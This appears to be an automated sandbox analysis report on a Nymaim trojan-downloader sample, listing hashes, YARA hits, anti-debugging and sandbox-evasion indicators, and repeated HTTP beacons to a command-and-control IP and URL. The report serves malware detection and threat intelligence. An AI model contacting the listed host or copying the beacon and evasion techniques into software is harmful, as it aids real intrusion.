Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565625
MD5:ac44247e8835b336845ad56b84583656
SHA1:ff499dadf0fd0f90d3e156ba2d521367678be35e
SHA256:e1a6fe984f3ffc681defb85678e20fb0fa1c4afe1a8e99dc974dc3253a04b371
Tags:exeuser-Bitsight
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7788 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AC44247E8835B336845AD56B84583656)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000000.00000003.1418979529.0000000004A40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.file.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          0.2.file.exe.4950e67.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            0.3.file.exe.4a40000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              0.2.file.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubYAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub9Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubIAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub)Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubkAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubXyAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubionAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 0.3.file.exe.4a40000.0.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 36%
                Source: file.exeVirustotal: Detection: 47%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04953837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04953837
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417727 FindFirstFileExW,0_2_00417727
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0496798E FindFirstFileExW,0_2_0496798E

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Joe Sandbox ViewIP Address: 185.156.72.65 185.156.72.65
                Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                Source: file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub)
                Source: file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub9
                Source: file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubI
                Source: file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubXy
                Source: file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubY
                Source: file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubi
                Source: file.exe, 00000000.00000002.3841763949.0000000000A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubion
                Source: file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubk
                Source: file.exe, 00000000.00000002.3841763949.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosuby

                E-Banking Fraud

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1418979529.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004109400_2_00410940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A3460_2_0041A346
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EBC70_2_0040EBC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403D400_2_00403D40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E590_2_00415E59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6D00_2_0040B6D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EE00_2_00402EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F700_2_00404F70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EF090_2_0040EF09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041572E0_2_0041572E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EC05B0_2_005EC05B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E5C010_2_005E5C01
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004730860_2_00473086
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004735440_2_00473544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C21180_2_004C2118
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F113E0_2_005F113E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C19B80_2_004C19B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005362110_2_00536211
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005566DA0_2_005566DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E8A9E0_2_005E8A9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BD28E0_2_005BD28E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005EDB130_2_005EDB13
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C07140_2_004C0714
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00499BD40_2_00499BD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E6FC30_2_005E6FC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00473BFE0_2_00473BFE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049551D70_2_049551D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495EE2E0_2_0495EE2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04953FA70_2_04953FA7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049659950_2_04965995
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049551D70_2_049551D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495B9370_2_0495B937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495F1700_2_0495F170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04960BA70_2_04960BA7
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0495AA07 appears 35 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A7A0 appears 35 times
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9941779458598726
                Source: file.exeStatic PE information: Section: goeehmfk ZLIB complexity 0.9919665634110787
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_047A8464 CreateToolhelp32Snapshot,Module32First,0_2_047A8464
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: C:\Users\user\Desktop\file.exeCommand line argument: nosub0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 36%
                Source: file.exeVirustotal: Detection: 47%
                Source: file.exeString found in binary or memory: /add?substr=
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2027520 > 1048576
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: Raw size of goeehmfk is bigger than: 0x100000 < 0x1acc00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;goeehmfk:EW;ukgkvxbu:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1f9d4c should be: 0x1f7cae
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: goeehmfk
                Source: file.exeStatic PE information: section name: ukgkvxbu
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070407A push ecx; ret 0_2_00704089
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704030 push esi; ret 0_2_0070403F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070483E push esi; ret 0_2_0070484D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007040D1 push edi; ret 0_2_007040E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007048DC push eax; iretd 0_2_007048DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007088C9 push es; retf 0_2_007088CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704148 push ecx; ret 0_2_00704157
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00704110 push edi; ret 0_2_0070411F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707186 push es; iretd 0_2_007071AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070426A push ecx; ret 0_2_00704279
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707A44 push 256453C2h; mov dword ptr [esp], edi0_2_00707ADA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707A44 push ecx; mov dword ptr [esp], ebx0_2_00707AFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707A44 push 089A6BD1h; mov dword ptr [esp], eax0_2_00707B28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00705AFD push 197958A1h; mov dword ptr [esp], ecx0_2_00705B5D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00705AFD push 6515846Ch; mov dword ptr [esp], ebp0_2_00705BE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00705AD7 push 197958A1h; mov dword ptr [esp], ecx0_2_00705B5D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00705AD7 push 6515846Ch; mov dword ptr [esp], ebp0_2_00705BE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00705AB5 push 197958A1h; mov dword ptr [esp], ecx0_2_00705B5D
